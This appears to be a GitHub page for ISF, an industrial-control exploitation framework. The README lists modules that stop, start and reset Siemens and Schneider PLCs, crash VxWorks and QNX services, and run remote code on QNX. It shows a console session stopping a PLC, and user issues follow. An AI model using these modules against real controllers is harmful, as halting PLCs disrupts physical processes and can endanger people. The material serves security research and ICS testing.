
isf's Introduction

Industrial Exploitation Framework

ISF (Industrial Exploitation Framework) is an exploitation framework based on Python, similar to the Metasploit Framework.

ISF is based on the open source project routersploit.

Disclaimer

Usage of ISF for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

ICS Protocol Clients

| Name | Path | Description |
| --- | --- | --- |
| modbus_tcp_client | icssploit/clients/modbus_tcp_client.py | Modbus-TCP Client |
| wdb2_client | icssploit/clients/wdb2_client.py | WdbRPC Version 2 Client (Vxworks 6.x) |
| s7_client | icssploit/clients/s7_client.py | s7comm Client (S7 300/400 PLC) |

Exploit Module

| Name | Path | Description |
| --- | --- | --- |
| s7_300_400_plc_control | exploits/plcs/siemens/s7_300_400_plc_control.py | S7-300/400 PLC start/stop |
| s7_1200_plc_control | exploits/plcs/siemens/s7_1200_plc_control.py | S7-1200 PLC start/stop/reset |
| vxworks_rpc_dos | exploits/plcs/vxworks/vxworks_rpc_dos.py | Vxworks RPC remote dos (CVE-2015-7599) |
| quantum_140_plc_control | exploits/plcs/schneider/quantum_140_plc_control.py | Schneider Quantum 140 series PLC start/stop |
| crash_qnx_inetd_tcp_service | exploits/plcs/qnx/crash_qnx_inetd_tcp_service.py | QNX Inetd TCP service dos |
| qconn_remote_exec | exploits/plcs/qnx/qconn_remote_exec.py | QNX qconn remote code execution |
| profinet_set_ip | exploits/plcs/siemens/profinet_set_ip.py | Profinet DCP device IP config |

Scanner Module

| Name | Path | Description |
| --- | --- | --- |
| profinet_dcp_scan | scanners/profinet_dcp_scan.py | Profinet DCP scanner |
| vxworks_6_scan | scanners/vxworks_6_scan.py | Vxworks 6.x scanner |
| s7comm_scan | scanners/s7comm_scan.py | S7comm scanner |
| enip_scan | scanners/enip_scan.py | EthernetIP scanner |

ICS Protocols Module (Scapy Module)

These protocols can be used in other fuzzing frameworks such as Kitty, or to create your own client.

| Name | Path | Description |
| --- | --- | --- |
| pn_dcp | icssploit/protocols/pn_dcp | Profinet DCP Protocol |
| modbus_tcp | icssploit/protocols/modbus_tcp | Modbus TCP Protocol |
| wdbrpc2 | icssploit/protocols/wdbrpc2 | WDB RPC Version 2 Protocol |
| s7comm | icssploit/protocols/s7comm.py | S7comm Protocol |

Install

Python requirements

Install on Kali

    git clone https://github.com/dark-lbp/isf/
    cd isf
    python isf.py

Usage

    root@kali:~/Desktop/temp/isf# python isf.py
    
      _____ _____  _____ _____ _____  _      ____ _____ _______
     |_   _/ ____|/ ____/ ____|  __ \| |    / __ \_   _|__   __|
       | || |    | (___| (___ | |__) | |   | |  | || |    | |
       | || |     \___ \\___ \|  ___/| |   | |  | || |    | |
      _| || |____ ____) |___) | |    | |___| |__| || |_   | |
     |_____\_____|_____/_____/|_|    |______\____/_____|  |_|
    
    
                    ICS Exploitation Framework
    
    Note     : ICSSPOLIT is fork from routersploit at
               https://github.com/reverse-shell/routersploit
    Dev Team : wenzhe zhu(dark-lbp)
    Version  : 0.1.0
    
    Exploits: 2 Scanners: 0 Creds: 13
    
    ICS Exploits:
        PLC: 2          ICS Switch: 0
        Software: 0
    
    isf >

Exploits

    isf > use exploits/plcs/
    exploits/plcs/siemens/  exploits/plcs/vxworks/
    isf > use exploits/plcs/siemens/s7_300_400_plc_control
    exploits/plcs/siemens/s7_300_400_plc_control
    isf > use exploits/plcs/siemens/s7_300_400_plc_control
    isf (S7-300/400 PLC Control) >

You can use the tab key for completion.

Options

Display module options:

    isf (S7-300/400 PLC Control) > show options

    Target options:

       Name       Current settings     Description
       ----       ----------------     -----------
       target                          Target address e.g. 192.168.1.1
       port       102                  Target Port


    Module options:

       Name        Current settings     Description
       ----        ----------------     -----------
       slot        2                    CPU slot number.
       command     1                    Command 0:start plc, 1:stop plc.


    isf (S7-300/400 PLC Control) >

Set options

    isf (S7-300/400 PLC Control) > set target 192.168.70.210
    [+] {'target': '192.168.70.210'}

Run module

    isf (S7-300/400 PLC Control) > run
    [*] Running module...
    [+] Target is alive
    [*] Sending packet to target
    [*] Stop plc
    isf (S7-300/400 PLC Control) >

Display information about exploit

    isf (S7-300/400 PLC Control) > show info

    Name:
    S7-300/400 PLC Control

    Description:
    Use S7comm command to start/stop plc.

    Devices:
    -  Siemens S7-300 and S7-400 programmable logic controllers (PLCs)

    Authors:
    -  wenzhe zhu <jtrkid[at]gmail.com>

    References:

    isf (S7-300/400 PLC Control) >

Documents

isf's People

Contributors

b2az, dark-lbp


isf's Issues

Port this to python3

I hate to be that guy, but python2 EOL'd back in april.

That was after it originally EOL'd in January.

That was after it was originally planned to EOL in 2015.

That was after python3 was released in 2006.

This was a very very very long time coming and there were numerous warnings.

I just saw this mentioned in a talk in August 2020 in the blackhat briefings.

Using an unsupported interpreter is a massive security issue and the irony is duly noted.

S7-1200 module - error: [Errno 104] Connection reset by peer

Testing the S7-1200 PLC Control module against a real S7-1200 (1212C), when sending the stop command, get:

    isf (S7-1200 PLC Control) > set target 192.168.1.190
    [+] {'target': '192.168.1.190'}
    isf (S7-1200 PLC Control) > set command 2
    [+] {'command': '2'}
    isf (S7-1200 PLC Control) > run
    [*] Running module...
    [+] Target is alive
    [*] Sending packet to target
    [*] reset plc
    [-] Traceback (most recent call last):
      File "/root/isf/icssploit/interpreter.py", line 337, in command_run
        self.current_module.run()
      File "/root/isf/icssploit/modules/exploits/plcs/siemens/s7_1200_plc_control.py", line 122, in run
        self.exploit()
      File "/root/isf/icssploit/modules/exploits/plcs/siemens/s7_1200_plc_control.py", line 107, in exploit
        self.start_ctrl(stop_cpu_packet)
      File "/root/isf/icssploit/modules/exploits/plcs/siemens/s7_1200_plc_control.py", line 95, in start_ctrl
        s.recv(1024)
    error: [Errno 104] Connection reset by peer

vxworks_6_X_scan doesn't work fine

When I try to learn the source code, I find "checksum()" in ./icssploit/protocol/wdbrpc2.py is undefined. Where can I import the package from?
Please help me, thanks!

Create release

For packing isf for distribution it would be easier if there were source tarballs available. Can you please create one? Thanks,

'type' object is not iterable

I am trying to run it, but I get this:

    python isf.py
    Traceback (most recent call last):
      File "isf.py", line 9, in <module>
        from icssploit.interpreter import IcssploitInterpreter
      File "/root/isf/icssploit/__init__.py", line 1, in <module>
        from icssploit.utils import (
      File "/root/isf/icssploit/utils/__init__.py", line 21, in <module>
        import requests
      File "/usr/lib/python2.7/dist-packages/requests/__init__.py", line 84, in <module>
        from urllib3.contrib import pyopenssl
      File "/usr/lib/python2.7/dist-packages/urllib3/contrib/pyopenssl.py", line 46, in <module>
        import OpenSSL.SSL
      File "/usr/lib/python2.7/dist-packages/OpenSSL/__init__.py", line 8, in <module>
        from OpenSSL import crypto, SSL
      File "/usr/lib/python2.7/dist-packages/OpenSSL/crypto.py", line 12, in <module>
        from cryptography import x509
      File "/usr/lib/python2.7/dist-packages/cryptography/x509/__init__.py", line 8, in <module>
        from cryptography.x509.base import (
      File "/usr/lib/python2.7/dist-packages/cryptography/x509/base.py", line 16, in <module>
        from cryptography.x509.extensions import Extension, ExtensionType
      File "/usr/lib/python2.7/dist-packages/cryptography/x509/extensions.py", line 24, in <module>
        from cryptography.x509.general_name import GeneralName, IPAddress, OtherName
      File "/usr/lib/python2.7/dist-packages/cryptography/x509/general_name.py", line 18, in <module>
        from cryptography.x509.name import Name
      File "/usr/lib/python2.7/dist-packages/cryptography/x509/name.py", line 28, in <module>
        _ASN1_TYPE_TO_ENUM = dict((i.value, i) for i in _ASN1Type)
    TypeError: 'type' object is not iterable

no module nmap

    Traceback (most recent call last):
      File "isf.py", line 9, in <module>
        from icssploit.interpreter import IcssploitInterpreter
      File "/root/Desktop/isf/icssploit/__init__.py", line 1, in <module>
        from icssploit.utils import (
      File "/root/Desktop/isf/icssploit/utils/__init__.py", line 15, in <module>
        import nmap
    ImportError: No module named nmap

Error: No module named nmap

There are some issues with the scanner module: No module named nmap

    isf > use scanners/vxworks_6_scan
    [-] Error during loading 'icssploit/modules/scanners/vxworks_6_scan'
    Error: No module named nmap
    It should be valid path to the module. Use <tab> key multiple times for completion.

After running the scan:

    nm = nmap.PortScanner()

    AttributeError: 'module' object has no attribute 'PortScanner'

mac os run isf???

    /dev/fd/12:18: command not found: compdef
    chikkachun@chikdeMBP ~ % git clone https://github.com/dark-lbp/isf/
    cd isf
    python isf.py
    fatal: destination path 'isf' already exists and is not an empty directory.
    zsh: command not found: python
    chikkachun@chikdeMBP isf % ls
    README-ZH.md docs lib
    README.md ics.cnvd logs
    core isf.gif module
    dependencies isf.py requirements.txt
    docker isf.xml
    chikkachun@chikdeMBP isf % isf.py
    zsh: command not found: isf.py
    chikkachun@chikdeMBP isf %

Connection reset by peer

I'm trying to stop my PLC (CPU1212C V4.2.1) or run with the exploit command but I receive this error:

    error: [Errno 104] Connection reset by peer

My PLC isn't protected.

Micro850

Can this tool be used for communication attacks on the Micro 850 PLC?
